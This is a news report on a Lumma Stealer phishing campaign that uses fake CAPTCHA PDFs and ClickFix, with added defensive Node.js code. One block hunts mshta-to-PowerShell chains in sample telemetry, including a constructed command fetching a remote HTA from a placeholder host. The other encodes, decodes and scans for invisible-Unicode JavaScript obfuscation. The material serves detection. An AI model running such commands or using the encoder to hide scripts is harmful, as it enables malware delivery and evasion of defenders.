
Cybersecurity researchers have discovered a widespread phishing campaign that uses fake CAPTCHA images embedded in PDF documents, hosted on Webflow's content delivery network (CDN), to distribute the Lumma Stealer malware.

Netskope Threat Labs said it identified 260 distinct domains hosting approximately 5,000 phishing PDF files, which redirect victims to malicious websites.

“The attacker employs search engine optimization (SEO) techniques to trick victims into visiting the pages by clicking on malicious search engine results,” security researcher Jan Michael Alcantara said in a report shared with The Hacker News.

“Unlike most phishing pages that focus on stealing credit card information, some PDF files contain fake CAPTCHAs that deceive victims into executing malicious PowerShell commands, ultimately leading to the Lumma Stealer malware.”

This phishing campaign is estimated to have affected over 1,150 organizations and more than 7,000 users since the second half of 2024, with the attacks primarily targeting victims in North America, Asia, and Southern Europe across the technology, financial services, and manufacturing sectors.

Among the 260 domains identified to host the fake PDFs, the majority are related to Webflow, followed by those related to GoDaddy, Strikingly, Wix, and Fastly.

Attackers have also been observed uploading some of the PDF files to legitimate online libraries and PDF repositories, such as PDFCOFFEE, PDF4PRO, PDFBean, and Internet Archive, so that users searching for PDF documents on search engines are directed to them.

In the credit-card variant, the PDFs contain fake CAPTCHA images that act as a conduit for stealing card details. In the variant that distributes Lumma Stealer, the PDF instead carries a "download document" image that, when clicked, takes the victim to a malicious site.

That site masquerades as a CAPTCHA verification page and uses the ClickFix technique to trick the victim into running an MSHTA command, which in turn launches a PowerShell script that executes the stealer.
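As an added illustration (not code from the Netskope report or from this article), the Node.js function below hunts for the execution chain just described in endpoint process-creation telemetry. Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the sample events, the hostname and the command lines are constructed, and the first rule's assumption that the victim launches mshta.exe from the shell (so its parent is explorer.exe) is an inference about how ClickFix lands, not a detail from the report.

```javascript
// Added example, not from the Netskope report: hunt for the ClickFix chain
// (victim runs an mshta command -> mshta launches a PowerShell script) in
// process-creation records shaped like Sysmon Event ID 1.

// Last path component, lower-cased, so "C:\Windows\System32\mshta.exe" -> "mshta.exe".
const exe = (p) => (p || "").split(/[\\\/]/).pop().toLowerCase();

function findClickFixChains(events) {
  const findings = [];
  for (const e of events) {
    const img = exe(e.Image);
    const parent = exe(e.ParentImage);
    const cmd = e.CommandLine || "";

    // Rule 1: mshta.exe started from the shell and pointed at a remote URL.
    // Assumption: ClickFix victims paste the command by hand, so the parent
    // is explorer.exe; legitimate HTA use from the shell with a URL is rare.
    if (img === "mshta.exe" && parent === "explorer.exe" && /https?:\/\//i.test(cmd)) {
      findings.push({ rule: "mshta-remote-from-shell", cmd });
    }

    // Rule 2: PowerShell whose parent is mshta.exe, the chain the article describes.
    if ((img === "powershell.exe" || img === "pwsh.exe") && parent === "mshta.exe") {
      findings.push({ rule: "mshta-spawns-powershell", cmd });
    }
  }
  return findings;
}

// Constructed sample telemetry: one benign PowerShell launch, then a ClickFix chain.
// The hostname and script names are placeholders, not indicators from the campaign.
const sampleEvents = [
  { Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    ParentImage: "C:\\Windows\\explorer.exe",
    CommandLine: "powershell.exe -File C:\\scripts\\backup.ps1" },
  { Image: "C:\\Windows\\System32\\mshta.exe",
    ParentImage: "C:\\Windows\\explorer.exe",
    CommandLine: "mshta https://captcha-check.example/verify.hta" },
  { Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    ParentImage: "C:\\Windows\\System32\\mshta.exe",
    CommandLine: "powershell -NoProfile -WindowStyle Hidden -File stage2.ps1" },
];

console.log(findClickFixChains(sampleEvents));
// -> two findings: mshta-remote-from-shell, then mshta-spawns-powershell
```

Both rules are low-noise because mshta.exe almost never appears as the parent of PowerShell, or is launched with a URL from the shell, in ordinary administration. The preventive counterpart is blocking mshta.exe outright with AppLocker or WDAC where nothing on the estate depends on HTA files.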

Recently, Lumma Stealer has also been disguised as Roblox games and a cracked version of the Total Commander tool for Windows, highlighting the various delivery mechanisms adopted by threat actors. Users are redirected to these websites through YouTube videos likely uploaded from previously compromised accounts.

“Malicious links and infected files are often disguised in YouTube videos, comments, or descriptions,” Silent Push said. “Exercising caution and being skeptical of unverified sources when interacting with YouTube content, especially when prompted to download or click on links, can help protect against these growing threats.”

The cybersecurity company further found that Lumma Stealer logs are being shared for free on a relatively new hacking forum called Leaky[.]pro that went operational in late December 2024.

Lumma Stealer is a fully-featured crimeware solution sold under the malware-as-a-service (MaaS) model, offering a way to harvest a wide range of information from compromised Windows hosts. In early 2024, the malware operators announced an integration with a Golang-based proxy malware named GhostSocks.

“The addition of a SOCKS5 backconnect feature to existing Lumma infections, or any malware for that matter, is highly lucrative for threat actors,” Infrawatch said.

“By leveraging victims’ internet connections, attackers can bypass geographic restrictions and IP-based integrity checks, particularly those enforced by financial institutions and other high-value targets. This capability significantly increases the probability of success for unauthorized access attempts using credentials harvested via infostealer logs, further enhancing the post-exploitation value of Lumma infections.”

The disclosures come as stealer malware like Vidar and Atomic macOS Stealer (AMOS) are being distributed using the ClickFix method via lures for the DeepSeek artificial intelligence (AI) chatbot, according to Zscaler ThreatLabz and eSentire.

Phishing attacks have also been spotted abusing a JavaScript obfuscation method that uses invisible Unicode characters to represent binary values, a technique that was first documented in October 2024.

This approach uses two Unicode filler characters, the Halfwidth Hangul Filler (U+FFA0) and the Hangul Filler (U+3164), to represent the binary values 0 and 1 respectively: each ASCII character of the JavaScript payload is converted to its binary form and written out as a string of these characters, which render as blank in an editor.
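The encoding just described, as an added example (not code from the article or from Juniper Threat Labs): an encoder, a decoder and a scanner for the invisible-Unicode obfuscation. It assumes the common 8-bits-per-character form of the scheme (bit 0 is U+FFA0, bit 1 is U+3164); the sample script it scans is constructed.

```javascript
// Added example, not from the article or Juniper's report: encode, decode and
// detect the invisible-Unicode JavaScript obfuscation. Each ASCII character of
// the payload becomes eight filler characters (assumed 8-bit form):
//   bit 0 -> U+FFA0 (HALFWIDTH HANGUL FILLER), bit 1 -> U+3164 (HANGUL FILLER).
// Both render as blank, so the encoded payload looks like an empty string.
const BIT0 = "\uFFA0";
const BIT1 = "\u3164";

// Obfuscate an ASCII payload: one character -> eight filler characters.
function encodeInvisible(payload) {
  let out = "";
  for (const ch of payload) {
    const code = ch.codePointAt(0);
    if (code > 0x7f) throw new Error("payload must be ASCII");
    for (let bit = 7; bit >= 0; bit--) {
      out += ((code >> bit) & 1) ? BIT1 : BIT0;
    }
  }
  return out;
}

// Reverse the encoding. Rejects anything that is not whole octets of fillers
// so a truncated or tampered blob is not silently decoded into garbage.
function decodeInvisible(blob) {
  if (blob.length % 8 !== 0) throw new Error("blob length is not a multiple of 8");
  let out = "";
  for (let i = 0; i < blob.length; i += 8) {
    let byte = 0;
    for (let j = 0; j < 8; j++) {
      const c = blob[i + j];
      if (c !== BIT0 && c !== BIT1) {
        throw new Error(`unexpected U+${c.charCodeAt(0).toString(16)} at ${i + j}`);
      }
      byte = (byte << 1) | (c === BIT1 ? 1 : 0);
    }
    out += String.fromCharCode(byte);
  }
  return out;
}

// Defender side: scan script text for runs of the two fillers and decode them.
// Legitimate source almost never contains these characters, so a run of eight
// or more is a strong signal on its own, before the decoded content is read.
const FILLER_RUN = /[\uFFA0\u3164]{8,}/g;

function findInvisiblePayloads(source) {
  const hits = [];
  for (const m of source.matchAll(FILLER_RUN)) {
    const run = m[0].slice(0, m[0].length - (m[0].length % 8)); // drop a ragged tail
    hits.push({ offset: m.index, fillerChars: m[0].length, decoded: decodeInvisible(run) });
  }
  return hits;
}

// Constructed sample: a script whose empty-looking string literal hides a payload.
const hiddenScript = 'const s = "' + encodeInvisible("alert(1)") + '";';
console.log(findInvisiblePayloads(hiddenScript));
// -> [{ offset: 11, fillerChars: 64, decoded: "alert(1)" }]
```

The scanner is deliberately cheap: a regex for the two code points run over attachments, HTML bodies or proxy-logged scripts catches this family regardless of what the decoded payload does, and the decoder then gives an analyst the cleartext to triage.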

“The attacks were highly personalized, including non-public information, and the initial JavaScript would try to invoke a debugger breakpoint if it were being analyzed, detect a delay, and then abort the attack by redirecting to a benign website,” Juniper Threat Labs said.
